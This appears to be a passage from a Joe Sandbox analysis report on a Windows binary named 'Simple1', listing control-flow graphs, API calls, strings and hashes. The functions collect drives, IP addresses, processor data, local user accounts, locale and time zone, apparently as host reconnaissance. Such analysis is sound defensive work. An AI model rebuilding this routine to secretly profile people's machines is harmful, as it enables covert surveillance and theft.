              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$InfoLocale_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@memcpymemset
              • String ID: Country: $Failed to get locale$Language:
              • API String ID: 3095796567-568146128
              • Opcode ID: 6777821781e00c1254704644d8379e6ded6b68f25752d4e6f5bb5cf1c72359dc
              • Instruction ID: 5b08bd4b6c924e5d783188d503f94c3509860168ef8620fabab496b241bb10b7
              • Opcode Fuzzy Hash: 6777821781e00c1254704644d8379e6ded6b68f25752d4e6f5bb5cf1c72359dc
              • Instruction Fuzzy Hash: 83B19272A18B8589EB10DF64D8807BD77A0FB857A8F808232DA5C27B99DF78D185C750

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1085 7ff7cea93780-7ff7cea937fc GetLogicalDrives memset call 7ff7cea96810 call 7ff7cea999f0 1090 7ff7cea93800-7ff7cea9380e 1085->1090 1091 7ff7cea93814-7ff7cea93890 call 7ff7cea99610 1090->1091 1092 7ff7cea9397a-7ff7cea93981 1090->1092 1101 7ff7cea93892-7ff7cea938a4 1091->1101 1102 7ff7cea938c4-7ff7cea938fe GetDiskFreeSpaceExA 1091->1102 1092->1090 1094 7ff7cea93987-7ff7cea939b4 1092->1094 1095 7ff7cea939e5-7ff7cea939e8 1094->1095 1096 7ff7cea939b6-7ff7cea939c0 1094->1096 1099 7ff7cea939ea-7ff7cea939f4 1095->1099 1100 7ff7cea93a0c-7ff7cea93a11 1095->1100 1096->1095 1098 7ff7cea939c2-7ff7cea939d5 1096->1098 1103 7ff7cea93a16-7ff7cea93a19 1098->1103 1099->1100 1106 7ff7cea939f6-7ff7cea93a0a 1099->1106 1100->1103 1107 7ff7cea938bf call 7ff7cea9b500 1101->1107 1108 7ff7cea938a6-7ff7cea938b9 1101->1108 1104 7ff7cea93900-7ff7cea93940 call 7ff7cea99820 call 7ff7cea999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff7cea999f0 1102->1104 1105 7ff7cea93941-7ff7cea9394a 1102->1105 1111 7ff7cea93a24-7ff7cea93a96 call 7ff7cea97c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff7cea9b4e0 1103->1111 1112 7ff7cea93a1b-7ff7cea93a23 call 7ff7cea996c0 1103->1112 1104->1105 1105->1092 1113 7ff7cea9394c-7ff7cea9395e 1105->1113 1106->1103 1107->1102 1108->1107 1114 7ff7cea939d7-7ff7cea939dd _invalid_parameter_noinfo_noreturn 1108->1114 1112->1111 1118 7ff7cea93960-7ff7cea93973 1113->1118 1119 7ff7cea93975 call 7ff7cea9b500 1113->1119 1115 7ff7cea939de-7ff7cea939e4 _invalid_parameter_noinfo_noreturn 1114->1115 1115->1095 1118->1115 1118->1119 1119->1092
              APIs
              • GetLogicalDrives.KERNELBASE ref: 00007FF7CEA937C5
              • memset.VCRUNTIME140 ref: 00007FF7CEA937DA
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A69
                • Part of subcall function 00007FF7CEA999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A89
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A99
                • Part of subcall function 00007FF7CEA999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B7C
                • Part of subcall function 00007FF7CEA999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B83
                • Part of subcall function 00007FF7CEA999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B90
              • GetDiskFreeSpaceExA.KERNELBASE ref: 00007FF7CEA938F6
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7CEA9392B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA939D7
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA939DE
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA93A59
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA93A63
                • Part of subcall function 00007FF7CEA99610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF7CEA91CCF), ref: 00007FF7CEA99656
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@D@std@@@1@@DiskDrivesFreeLogicalOsfx@?$basic_ostream@_SpaceV01@_V12@V?$basic_streambuf@memcpymemset
              • String ID: GB$Available Drives:
              • API String ID: 2435906160-4081138596
              • Opcode ID: d460782d3c6bd2cda83ac6620a73d963f36d04f046d50e4f1f029c8829c4127c
              • Instruction ID: ecdcbc7ea42bc43ae022df8bae405d0e7c23f2c43020f3b830b8a071b16b0625
              • Opcode Fuzzy Hash: d460782d3c6bd2cda83ac6620a73d963f36d04f046d50e4f1f029c8829c4127c
              • Instruction Fuzzy Hash: 9D91E822A18B8189EB20DF25D8407BDB770FB857A4F949232DE8D27AA5DF3CD585C710

              Control-flow Graph

              APIs
              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7CEA93AEB
              • memset.VCRUNTIME140 ref: 00007FF7CEA93B01
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
              • GetAdaptersInfo.IPHLPAPI ref: 00007FF7CEA93B19
              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7CEA93B28
              • GetAdaptersInfo.IPHLPAPI ref: 00007FF7CEA93B39
              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7CEA93BC0
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA93C8E
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA93C98
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$AdaptersInfomalloc$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@V?$basic_streambuf@freememset
              • String ID: Adapter: $IP Address:
              • API String ID: 1136092572-1613687433
              • Opcode ID: 06b27aec4c232e626f636c09154849647e9ee1243f3ad1ae019303bbe33ba379
              • Instruction ID: 2c060a7eff6ae030b094317adb3798e8e190418e00ff3a135927162fb279df91
              • Opcode Fuzzy Hash: 06b27aec4c232e626f636c09154849647e9ee1243f3ad1ae019303bbe33ba379
              • Instruction Fuzzy Hash: CA519C72A09A8199EB10EF15D840ABEA7B1FB84BA4F848132DE4D27B65DF3CE445C750

              Control-flow Graph

              APIs
              • GetSystemInfo.KERNELBASE ref: 00007FF7CEA9359E
              • memset.VCRUNTIME140 ref: 00007FF7CEA935B0
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A69
                • Part of subcall function 00007FF7CEA999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A89
                • Part of subcall function 00007FF7CEA999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99A99
                • Part of subcall function 00007FF7CEA999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B7C
                • Part of subcall function 00007FF7CEA999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B83
                • Part of subcall function 00007FF7CEA999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B90
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z.MSVCP140 ref: 00007FF7CEA935D7
                • Part of subcall function 00007FF7CEA999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99AE6
                • Part of subcall function 00007FF7CEA999F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B0F
                • Part of subcall function 00007FF7CEA999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF7CEA919FA), ref: 00007FF7CEA99B36
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CEA93603
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA936DC
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA936E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@?good@ios_base@std@@?sputc@?$basic_streambuf@V01@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@InfoOsfx@?$basic_ostream@_SystemV12@V?$basic_streambuf@memset
              • String ID: Number of Cores: $Processor Architecture:
              • API String ID: 777187999-1490948189
              • Opcode ID: db8688cd583bdc27e0cdb5cc254e17eb9a2918b1e2afa49accf7bbecb9bde412
              • Instruction ID: 84029ba185a355027b41b788b3f6715da23486b70185d409b8dffb5f5941703f
              • Opcode Fuzzy Hash: db8688cd583bdc27e0cdb5cc254e17eb9a2918b1e2afa49accf7bbecb9bde412
              • Instruction Fuzzy Hash: 1F519D72A08A8199EB10EF65DC406BDB3B1FB88B98F848132DA4D27769DF3CD545C750
              APIs
              • memset.VCRUNTIME140 ref: 00007FF7CEA93D2C
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
              • NetUserEnum.NETAPI32 ref: 00007FF7CEA93D6B
              • NetApiBufferFree.NETAPI32 ref: 00007FF7CEA93E4A
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA93E9F
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA93F1A
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA93F24
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BufferD@std@@@1@@EnumFreeUserV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
              • String ID: User:
              • API String ID: 429987867-381282118
              • Opcode ID: 81cad7912bdc9e2d23d23b83485d0763708482a1ed38764782d50a90e92ae5cf
              • Instruction ID: c7df46a94326d1bb382768c119e329683cca02653f3cda56921bddba0c16519a
              • Opcode Fuzzy Hash: 81cad7912bdc9e2d23d23b83485d0763708482a1ed38764782d50a90e92ae5cf
              • Instruction Fuzzy Hash: 8A719132A18B818AEB10DF69D8406BDB7B0FB84BA4F944135DB4D23B69DF38D445C750
              APIs
              • GetTimeZoneInformation.KERNELBASE ref: 00007FF7CEA941BD
              • memset.VCRUNTIME140 ref: 00007FF7CEA941D0
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA9427D
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA94351
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA9435B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationTimeV?$basic_streambuf@Zone_invalid_parameter_noinfo_noreturnmemset
              • String ID: Time Zone:
              • API String ID: 35776714-1239252231
              • Opcode ID: 75bbc8ce734ddddbefa210bc158d7e0c5e5b80efdefa61028389241404bfc98f
              • Instruction ID: fa497d35ff2feebcfc4840c9eb69434804143a24ee0d5473e28125c77864fdb4
              • Opcode Fuzzy Hash: 75bbc8ce734ddddbefa210bc158d7e0c5e5b80efdefa61028389241404bfc98f
              • Instruction Fuzzy Hash: EA51D672A18B8589EB20EF65E8806FDA7B1FB847A4F848132DA4D23759DF3CD481C710

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 933 7ff7cea91820-7ff7cea9186f memset 934 7ff7cea91871 933->934 935 7ff7cea91874-7ff7cea918ae call 7ff7cea989e0 933->935 934->935 938 7ff7cea918b0-7ff7cea91901 call 7ff7cea999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 935->938 939 7ff7cea91906-7ff7cea91941 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z 935->939 949 7ff7cea91a7e-7ff7cea91ac6 call 7ff7cea97530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff7cea9b4e0 938->949 941 7ff7cea91943-7ff7cea91950 939->941 942 7ff7cea919b8-7ff7cea919bd 939->942 945 7ff7cea91956-7ff7cea9195d 941->945 946 7ff7cea91acd-7ff7cea91b3a call 7ff7cea9b060 call 7ff7cea97530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 941->946 943 7ff7cea919c2-7ff7cea919e5 ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z ??7ios_base@std@@QEBA_NXZ 942->943 947 7ff7cea91a52-7ff7cea91a59 943->947 948 7ff7cea919e7-7ff7cea91a18 call 7ff7cea999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 943->948 951 7ff7cea9195f-7ff7cea91966 945->951 952 7ff7cea91988-7ff7cea91990 call 7ff7cea9b508 945->952 959 7ff7cea91a5d-7ff7cea91a7a 947->959 948->959 969 7ff7cea91a1a-7ff7cea91a27 948->969 957 7ff7cea91ac7-7ff7cea91acc call 7ff7cea91270 951->957 958 7ff7cea9196c call 7ff7cea9b508 951->958 966 7ff7cea91993-7ff7cea919b6 memset 952->966 957->946 971 7ff7cea91971-7ff7cea91974 958->971 959->949 966->943 973 7ff7cea91a45-7ff7cea91a50 call 7ff7cea9b500 969->973 974 7ff7cea91a29-7ff7cea91a3c 969->974 975 7ff7cea9197a-7ff7cea91986 971->975 976 7ff7cea91a3e-7ff7cea91a44 _invalid_parameter_noinfo_noreturn 971->976 973->959 974->973 974->976 975->966 976->973
              APIs
              • memset.VCRUNTIME140 ref: 00007FF7CEA91865
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA918CD
              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF7CEA91910
              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF7CEA91927
              • memset.VCRUNTIME140 ref: 00007FF7CEA919A9
                • Part of subcall function 00007FF7CEA9B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7CEA9107B), ref: 00007FF7CEA9B522
              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF7CEA919CD
              • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA919DD
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CEA91A04
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA91A3E
              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA91A8D
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA91A97
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA91AC7
              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA91B2C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@$V01@$??1?$basic_istream@??6?$basic_ostream@V01@@memset$??1?$basic_ios@??7ios_base@std@@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@Concurrency::cancel_current_taskMbstatet@@@2@V12@V12@_V?$fpos@_invalid_parameter_noinfo_noreturnmalloc
              • String ID: Couldn't open the file$Couldn't read the file
              • API String ID: 2898521299-2967168750
              • Opcode ID: 4b704e4893583e8fd057f23457a3a830564eddebf5c412215330ce736816677e
              • Instruction ID: 462145894bba5e19ce2f24e575e4635faf73fa0b1a90b74800c91610930e554c
              • Opcode Fuzzy Hash: 4b704e4893583e8fd057f23457a3a830564eddebf5c412215330ce736816677e
              • Instruction Fuzzy Hash: BA91AB32A08B8595EB10EF15E840ABDB3A1FB84BA4F858632DE5D17BA5DF3CE445C710

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1035 7ff7cea91520-7ff7cea91617 call 7ff7cea9c374 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z 1038 7ff7cea91621 1035->1038 1039 7ff7cea91619-7ff7cea9161f 1035->1039 1040 7ff7cea91624-7ff7cea91631 1038->1040 1039->1040 1041 7ff7cea916bf-7ff7cea916ec 1040->1041 1042 7ff7cea91637 1040->1042 1043 7ff7cea91710-7ff7cea91713 1041->1043 1044 7ff7cea916ee-7ff7cea916f8 1041->1044 1045 7ff7cea91640-7ff7cea91650 isalnum 1042->1045 1047 7ff7cea91715-7ff7cea9171f 1043->1047 1048 7ff7cea91738-7ff7cea9173d 1043->1048 1044->1043 1046 7ff7cea916fa-7ff7cea9170e 1044->1046 1049 7ff7cea91652-7ff7cea91657 1045->1049 1050 7ff7cea916a3-7ff7cea916ab call 7ff7cea99820 1045->1050 1052 7ff7cea91742-7ff7cea91745 1046->1052 1047->1048 1053 7ff7cea91721-7ff7cea91736 1047->1053 1048->1052 1049->1050 1054 7ff7cea91659-7ff7cea9165c 1049->1054 1055 7ff7cea916b0-7ff7cea916b6 1050->1055 1057 7ff7cea91750-7ff7cea917bb call 7ff7cea97c10 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff7cea9b4e0 1052->1057 1058 7ff7cea91747-7ff7cea9174f call 7ff7cea996c0 1052->1058 1053->1052 1054->1050 1056 7ff7cea9165e-7ff7cea91661 1054->1056 1055->1045 1059 7ff7cea916b8 1055->1059 1056->1050 1060 7ff7cea91663-7ff7cea916a1 ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z call 7ff7cea99820 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z 1056->1060 1058->1057 1059->1041 1060->1055
              APIs
              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9157F
              • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CEA9159E
              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA915D2
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CEA91609
              • isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CEA91648
